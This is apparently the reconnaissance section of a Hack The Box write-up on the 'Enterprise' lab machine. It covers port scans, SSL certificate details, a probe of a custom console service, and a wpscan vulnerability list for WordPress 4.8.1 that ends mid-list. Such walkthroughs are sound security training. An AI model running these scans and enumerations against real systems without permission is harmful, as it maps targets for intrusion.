Enterprise
Contents
Ports scan
u505@kali:~/HTB/Machines/Enterprise$ sudo masscan -e tun0 -p1-65535,U:1-65535 --rate 1000 10.10.10.61 [sudo] password for u505:
Starting masscan 1.0.5 at 2020-05-21 21:03:15 GMT -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth Initiating SYN Stealth Scan Scanning 1 hosts [131070 ports/host] Discovered open port 8080/tcp on 10.10.10.61 Discovered open port 22/tcp on 10.10.10.61 Discovered open port 32812/tcp on 10.10.10.61 Discovered open port 443/tcp on 10.10.10.61 Discovered open port 80/tcp on 10.10.10.61 u505@kali:~/HTB/Machines/Enterprise$ nmap -sC -sV 10.10.10.61 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 17:03 EDT Nmap scan report for 10.10.10.61 Host is up (0.037s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 c4:e9:8c:c5:b5:52:23:f4:b8:ce:d1:96:4a:c0:fa:ac (RSA) | 256 f3:9a:85:58:aa:d9:81:38:2d:ea:15:18:f7:8e:dd:42 (ECDSA) |_ 256 de:bf:11:6d:c0:27:e3:fc:1b:34:c0:4f:4f:6c:76:8b (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: WordPress 4.8.1 |_http-server-header: Apache/2.4.10 (Debian) |_http-title: USS Enterprise – Ships Log 443/tcp open ssl/http Apache httpd 2.4.25 ((Ubuntu)) |_http-server-header: Apache/2.4.25 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works | ssl-cert: Subject: commonName=enterprise.local/organizationName=USS Enterprise/stateOrProvinceName=United Federation of Planets/countryName=UK | Not valid before: 2017-08-25T10:35:14 |_Not valid after: 2017-09-24T10:35:14 |_ssl-date: TLS randomness does not represent time | tls-alpn: |_ http/1.1 8080/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-generator: Joomla! - Open Source Content Management | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION | http-robots.txt: 15 disallowed entries | /joomla/administrator/ /administrator/ /bin/ /cache/ | /cli/ /components/ /includes/ /installation/ /language/ |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/ |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Home Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.30 seconds
We launch sslscan over the port 443.
u505@kali:~/HTB/Machines/Enterprise$ sslscan --show-certificate https://enterprise.local Version: 2.0.0-static OpenSSL 1.1.1h-dev xx XXX xxxx
Connected to 10.10.10.61
Testing SSL server enterprise.local on port 443 using SNI name enterprise.local
SSL/TLS Protocols: SSLv2 disabled SSLv3 disabled TLSv1.0 enabled TLSv1.1 enabled TLSv1.2 enabled TLSv1.3 disabled
TLS Fallback SCSV: Server supports TLS Fallback SCSV
TLS renegotiation: Secure session renegotiation supported
TLS Compression: Compression disabled
Heartbleed: TLSv1.2 not vulnerable to heartbleed TLSv1.1 not vulnerable to heartbleed TLSv1.0 not vulnerable to heartbleed
Supported Server Cipher(s): Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.2 256 bits AES256-GCM-SHA384 Accepted TLSv1.2 128 bits AES128-GCM-SHA256 Accepted TLSv1.2 256 bits AES256-SHA256 Accepted TLSv1.2 128 bits AES128-SHA256 Accepted TLSv1.2 256 bits AES256-SHA Accepted TLSv1.2 256 bits CAMELLIA256-SHA Accepted TLSv1.2 128 bits AES128-SHA Accepted TLSv1.2 128 bits CAMELLIA128-SHA Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.1 256 bits AES256-SHA Accepted TLSv1.1 256 bits CAMELLIA256-SHA Accepted TLSv1.1 128 bits AES128-SHA Accepted TLSv1.1 128 bits CAMELLIA128-SHA Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256 Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256 Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits Accepted TLSv1.0 256 bits AES256-SHA Accepted TLSv1.0 256 bits CAMELLIA256-SHA Accepted TLSv1.0 128 bits AES128-SHA Accepted TLSv1.0 128 bits CAMELLIA128-SHA
Server Key Exchange Group(s): TLSv1.2 141 bits sect283k1 TLSv1.2 141 bits sect283r1 TLSv1.2 204 bits sect409k1 TLSv1.2 204 bits sect409r1 TLSv1.2 285 bits sect571k1 TLSv1.2 285 bits sect571r1 TLSv1.2 128 bits secp256k1 TLSv1.2 128 bits secp256r1 (NIST P-256) TLSv1.2 192 bits secp384r1 (NIST P-384) TLSv1.2 260 bits secp521r1 (NIST P-521) TLSv1.2 128 bits brainpoolP256r1 TLSv1.2 192 bits brainpoolP384r1 TLSv1.2 256 bits brainpoolP512r1
Server Signature Algorithm(s): TLSv1.2 rsa_pkcs1_sha1 TLSv1.2 dsa_sha1 TLSv1.2 ecdsa_sha1 TLSv1.2 rsa_pkcs1_sha224 TLSv1.2 dsa_sha224 TLSv1.2 ecdsa_sha224 TLSv1.2 rsa_pkcs1_sha256 TLSv1.2 dsa_sha256 TLSv1.2 ecdsa_secp256r1_sha256 TLSv1.2 rsa_pkcs1_sha384 TLSv1.2 dsa_sha384 TLSv1.2 ecdsa_secp384r1_sha384 TLSv1.2 rsa_pkcs1_sha512 TLSv1.2 dsa_sha512 TLSv1.2 ecdsa_secp521r1_sha512
SSL Certificate: Certificate blob: -----BEGIN CERTIFICATE----- MIIERTCCAy2gAwIBAgIJALffXrYDvptrMA0GCSqGSIb3DQEBCwUAMIG4MQswCQYD VQQGEwJVSzElMCMGA1UECAwcVW5pdGVkIEZlZGVyYXRpb24gb2YgUGxhbmV0czEO MAwGA1UEBwwFRWFydGgxFzAVBgNVBAoMDlVTUyBFbnRlcnByaXNlMQ8wDQYDVQQL DAZCcmlkZ2UxGTAXBgNVBAMMEGVudGVycHJpc2UubG9jYWwxLTArBgkqhkiG9w0B CQEWHmplYW5sdWNwaWNhcmRAZW50ZXJwcmlzZS5sb2NhbDAeFw0xNzA4MjUxMDM1 MTRaFw0xNzA5MjQxMDM1MTRaMIG4MQswCQYDVQQGEwJVSzElMCMGA1UECAwcVW5p dGVkIEZlZGVyYXRpb24gb2YgUGxhbmV0czEOMAwGA1UEBwwFRWFydGgxFzAVBgNV BAoMDlVTUyBFbnRlcnByaXNlMQ8wDQYDVQQLDAZCcmlkZ2UxGTAXBgNVBAMMEGVu dGVycHJpc2UubG9jYWwxLTArBgkqhkiG9w0BCQEWHmplYW5sdWNwaWNhcmRAZW50 ZXJwcmlzZS5sb2NhbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALnT YTRemITs1/mZWwneQqW+s9wgvRUhgxGD7CwqYmhgwDS2N7MlcNZJYtoi46x3TJ52 qe4WleGMRxxVDDvveqGYb2Hs230Di13gheCLc9kXNEIfVa3PtgR2KUth42rq4VPQ l7O0vCipdyKt0NkUHxUUcUOoRakueQmFWh57gXm7vAwqvuzm3byhYoq4yverKmL3 IChJKPxLur5XRVk4sXbhR3pESLYs+tKMTx0wzFMtEPAqyLY/f4efemgCwCNTe0s3 +C0COiIgTgMZn2rx2ToqOrNNwFVkVKQoSRrMQ4/7P5Mheyu+dL/MWnc/SxPSgie+ miq3oqeFeZWje5lQKwUCAwEAAaNQME4wHQYDVR0OBBYEFKU8n3KqjrULUsCOyW7C ewA0TVevMB8GA1UdIwQYMBaAFKU8n3KqjrULUsCOyW7CewA0TVevMAwGA1UdEwQF MAMBAf8wDQYJKoZIhvcNAQELBQADggEBAC3/EPr9EdW6lQ6RuFJ1/5kPtJU7XvaY DV8fyd6uXkWigzd/HpnlVAjF0rQdDRhfE4HRbNez6zCGcV3F5Pxl3OgzmdX5TtfH OlU2R5eY3TBIuARtywOM/aJZTN8NuYxUZ5Z/Su6GwtDO3ot6hZmRbcaUA41Wg6qZ O+BSgoJctQqR1eKV5NjZ5IqgUqQWmqs2x9JqH7or++aMf1GeHd08c0gSKHRgA4PB NAbDye/ORY7yVr+In3zKSpBU2xosNngxbvgn3ZGGfGVBhzHw3k9KykofNykbu5tD Dp1D4W+G+LvAcPCAEM5W96Y6dWyVplvyZOgySi31MPIw5rGBm5tTcHU= -----END CERTIFICATE----- Version: 2 Serial Number: b7:df:5e:b6:03:be:9b:6b Signature Algorithm: sha256WithRSAEncryption Issuer: /C=UK/ST=United Federation of Planets/L=Earth/O=USS Enterprise/OU=Bridge/CN=enterprise.local/emailAddress=jeanlucpicard@enterprise.local Not valid before: Aug 25 10:35:14 2017 GMT Not valid after: Sep 24 10:35:14 2017 GMT Subject: /C=UK/ST=United Federation of Planets/L=Earth/O=USS Enterprise/OU=Bridge/CN=enterprise.local/emailAddress=jeanlucpicard@enterprise.local Public Key Algorithm: NULL RSA Public Key: (2048 bit) RSA Public-Key: (2048 bit) Modulus: 00:b9:d3:61:34:5e:98:84:ec:d7:f9:99:5b:09:de: 42:a5:be:b3:dc:20:bd:15:21:83:11:83:ec:2c:2a: 62:68:60:c0:34:b6:37:b3:25:70:d6:49:62:da:22: e3:ac:77:4c:9e:76:a9:ee:16:95:e1:8c:47:1c:55: 0c:3b:ef:7a:a1:98:6f:61:ec:db:7d:03:8b:5d:e0: 85:e0:8b:73:d9:17:34:42:1f:55:ad:cf:b6:04:76: 29:4b:61:e3:6a:ea:e1:53:d0:97:b3:b4:bc:28:a9: 77:22:ad:d0:d9:14:1f:15:14:71:43:a8:45:a9:2e: 79:09:85:5a:1e:7b:81:79:bb:bc:0c:2a:be:ec:e6: dd:bc:a1:62:8a:b8:ca:f7:ab:2a:62:f7:20:28:49: 28:fc:4b:ba:be:57:45:59:38:b1:76:e1:47:7a:44: 48:b6:2c:fa:d2:8c:4f:1d:30:cc:53:2d:10:f0:2a: c8:b6:3f:7f:87:9f:7a:68:02:c0:23:53:7b:4b:37: f8:2d:02:3a:22:20:4e:03:19:9f:6a:f1:d9:3a:2a: 3a:b3:4d:c0:55:64:54:a4:28:49:1a:cc:43:8f:fb: 3f:93:21:7b:2b:be:74:bf:cc:5a:77:3f:4b:13:d2: 82:27:be:9a:2a:b7:a2:a7:85:79:95:a3:7b:99:50: 2b:05 Exponent: 65537 (0x10001) X509v3 Extensions: X509v3 Subject Key Identifier: A5:3C:9F:72:AA:8E:B5:0B:52:C0:8E:C9:6E:C2:7B:00:34:4D:57:AF X509v3 Authority Key Identifier: keyid:A5:3C:9F:72:AA:8E:B5:0B:52:C0:8E:C9:6E:C2:7B:00:34:4D:57:AF
X509v3 Basic Constraints: CA:TRUE Verify Certificate: self signed certificate
SSL Certificate: Signature Algorithm: sha256WithRSAEncryption RSA Key Strength: 2048
Subject: enterprise.local Issuer: enterprise.local
Not valid before: Aug 25 10:35:14 2017 GMT Not valid after: Sep 24 10:35:14 2017 GMT
There was a strange port on masscan, we scan it.
u505@kali:~/HTB/Machines/Enterprise$ nmap -sC -sV -p 32812 10.10.10.61 Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 17:07 EDT Nmap scan report for enterprise.htb (10.10.10.61) Host is up (0.24s latency).
PORT STATE SERVICE VERSION 32812/tcp open unknown | fingerprint-strings: | GenericLines, GetRequest, HTTPOptions: | _______ _______ ______ _______ | |_____| |_____/ |______ | |_____ |_____ | | | _ ______| | Welcome to the Library Computer Access and Retrieval System | Enter Bridge Access Code: | Invalid Code | Terminating Console | NULL: | _______ _______ ______ _______ | |_____| |_____/ |______ | |_____ |_____ | | | _ ______| | Welcome to the Library Computer Access and Retrieval System |_ Enter Bridge Access Code: 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port32812-TCP:V=7.80%I=7%D=5/21%Time=5EC6ED93%P=x86_64-pc-linux-gnu%r(N SF:ULL,ED,"\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20_______\x20_______\x20\x20______\x20_______\n\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x20\x SF:20\x20\|_____\|\x20\|_____/\x20\|______\n\x20\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\|_____\x20\|_____\x20\x20\|\x20\x20\x20\x20\x20\|\x20\|\x20\ SF:x20\x20\x20\\_\x20______\|\n\nWelcome\x20to\x20the\x20Library\x20Comput SF:er\x20Access\x20and\x20Retrieval\x20System\n\nEnter\x20Bridge\x20Access SF:\x20Code:\x20\n")%r(GenericLines,110,"\n\x20\x20\x20\x20\x20\x20\x20\x2 SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20______\x SF:20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20\x SF:20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|______\n SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20\|\x2 SF:0\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcome\x20 SF:to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20Syste SF:m\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTermina SF:ting\x20Console\n\n")%r(GetRequest,110,"\n\x20\x20\x20\x20\x20\x20\x20\ SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20______ SF:\x20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\x20 SF:\x20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|______ SF:\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20\|\ SF:x20\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcome\x SF:20to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20Sys SF:tem\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTermi SF:nating\x20Console\n\n")%r(HTTPOptions,110,"\n\x20\x20\x20\x20\x20\x20\x SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20_______\x20_______\x20\x20___ SF:___\x20_______\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\x20\x20\ SF:x20\x20\x20\|\x20\x20\x20\x20\x20\x20\x20\|_____\|\x20\|_____/\x20\|___ SF:___\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|_____\x20\|_____\x20\x20 SF:\|\x20\x20\x20\x20\x20\|\x20\|\x20\x20\x20\x20\\_\x20______\|\n\nWelcom SF:e\x20to\x20the\x20Library\x20Computer\x20Access\x20and\x20Retrieval\x20 SF:System\n\nEnter\x20Bridge\x20Access\x20Code:\x20\n\nInvalid\x20Code\nTe SF:rminating\x20Console\n\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.25 seconds
Port 32812
u505@kali:~/HTB/Machines/Enterprise$ nc 10.10.10.61 32812
_______ _______ ______ _______ | | |_____| |_____/ |______ |_____ |_____ | | | \_ ______|
Welcome to the Library Computer Access and Retrieval System
Enter Bridge Access Code: 12345
Invalid Code Terminating Console
Ncat: Broken pipe.
It seems a custom program, with probably an overflow vulnerability, but we will come back later on this.
Port 80
Wpscan
u505@kali:~/HTB/Machines/Enterprise$ wpscan --url http://10.10.10.61 -v --detection-mode aggressive --enumerate dbe,vp,vt,cb,u,m --api-token <API_TOKEN>
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.1
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]y
[i] Updating the Database ...
[i] File(s) Updated:
| metadata.json
| dynamic_finders.yml
[i] Update completed.
[+] URL: http://10.10.10.61/ [10.10.10.61]
[+] Started: Thu May 21 17:19:33 2020
Interesting Finding(s):
[+] XML-RPC seems to be enabled: http://10.10.10.61/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] http://10.10.10.61/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://10.10.10.61/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.8.1 identified (Insecure, released on 2017-08-02).
| Found By: Atom Generator (Aggressive Detection)
| - http://10.10.10.61/?feed=atom, <generator uri="https://wordpress.org/" version="4.8.1">WordPress</generator>
| Confirmed By: Style Etag (Aggressive Detection)
| - http://10.10.10.61/wp-admin/load-styles.php, Match: '4.8.1'
|
| [!] 43 vulnerabilities identified:
|
| [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8905
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14723
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
| - https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
|
| [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41398
|
| [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41457
| - https://hackerone.com/reports/205481
|
| [!] Title: WordPress 4.4-4.8.1 - Path Traversal in Customizer
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14722
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41397
|
| [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41448
|
| [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
| Fixed in: 4.8.2
| References:
| - https://wpvulndb.com/vulnerabilities/8914
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
| - https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/changeset/41395
| - https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
|
| [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
| References:
| - https://wpvulndb.com/vulnerabilities/8807
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
| - https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
| - https://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
| - https://core.trac.wordpress.org/ticket/25239
|
| [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
| Fixed in: 4.8.3
| References:
| - https://wpvulndb.com/vulnerabilities/8941
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
| - https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
| - https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
| - https://twitter.com/ircmaxell/status/923662170092638208
| - https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
|
| [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
| Fixed in: 4.8.4
| References:
| - https://wpvulndb.com/vulnerabilities/8966
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
|
| [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
| Fixed in: 4.8.4
| References:
| - https://wpvulndb.com/vulnerabilities/8967
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
|
| [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
| Fixed in: 4.8.4
| References:
| - https://wpvulndb.com/vulnerabilities/8968
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
|
| [!] Title: WordPress 3.7-4.9 - 'newbloguser' Key Weak Hashing
| Fixed in: 4.8.4
| References:
| - https://wpvulndb.com/vulnerabilities/8969
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17091
| - https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/eaf1cfdc1fe0bdffabd8d879c591b864d833326c
|
| [!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
| Fixed in: 4.8.5
| References:
| - https://wpvulndb.com/vulnerabilities/9006
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5776
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9263
| - https://github.com/WordPress/WordPress/commit/3fe9cb61ee71fcfadb5e002399296fcc1198d850
| - https://wordpress.org/news/2018/01/wordpress-4-9-2-security-and-maintenance-release/
| - https://core.trac.wordpress.org/ticket/42720
|
| [!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
| References:
| - https://wpvulndb.com/vulnerabilities/9021
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
| - https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
| - https://github.com/quitten/doser.py
| - https://thehackernews.com/2018/02/wordpress-dos-exploit.html
|
| [!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
| Fixed in: 4.8.6
| References:
| - https://wpvulndb.com/vulnerabilities/9053
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10101
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/804363859602d4050d9a38a21f5a65d9aec18216
|
| [!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
| Fixed in: 4.8.6
| References:
| - https://wpvulndb.com/vulnerabilities/9054
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10100
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/14bc2c0a6fde0da04b47130707e01df850eedc7e
|
| [!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
| Fixed in: 4.8.6
| References:
| - https://wpvulndb.com/vulnerabilities/9055
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-10102
| - https://wordpress.org/news/2018/04/wordpress-4-9-5-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/31a4369366d6b8ce30045d4c838de2412c77850d
|
| [!] Title: WordPress <= 4.9.6 - Authenticated Arbitrary File Deletion
| Fixed in: 4.8.7
| References:
| - https://wpvulndb.com/vulnerabilities/9100
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12895
| - https://blog.ripstech.com/2018/wordpress-file-delete-to-code-execution/
| - http://blog.vulnspy.com/2018/06/27/Wordpress-4-9-6-Arbitrary-File-Delection-Vulnerbility-Exploit/
| - https://github.com/WordPress/WordPress/commit/c9dce0606b0d7e6f494d4abe7b193ac046a322cd
| - https://wordpress.org/news/2018/07/wordpress-4-9-7-security-and-maintenance-release/
| - https://www.wordfence.com/blog/2018/07/details-of-an-additional-file-deletion-vulnerability-patched-in-wordpress-4-9-7/
|
| [!] Title: WordPress <= 5.0 - Authenticated File Delete
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9169
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20147
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Post Type Bypass
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9170
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20152
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://blog.ripstech.com/2018/wordpress-post-type-privilege-escalation/
|
| [!] Title: WordPress <= 5.0 - PHP Object Injection via Meta Data
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9171
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20148
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Authenticated Cross-Site Scripting (XSS)
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9172
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20153
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - Cross-Site Scripting (XSS) that could affect plugins
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9173
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20150
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/fb3c6ea0618fcb9a51d4f2c1940e9efcd4a2d460
|
| [!] Title: WordPress <= 5.0 - User Activation Screen Search Engine Indexing
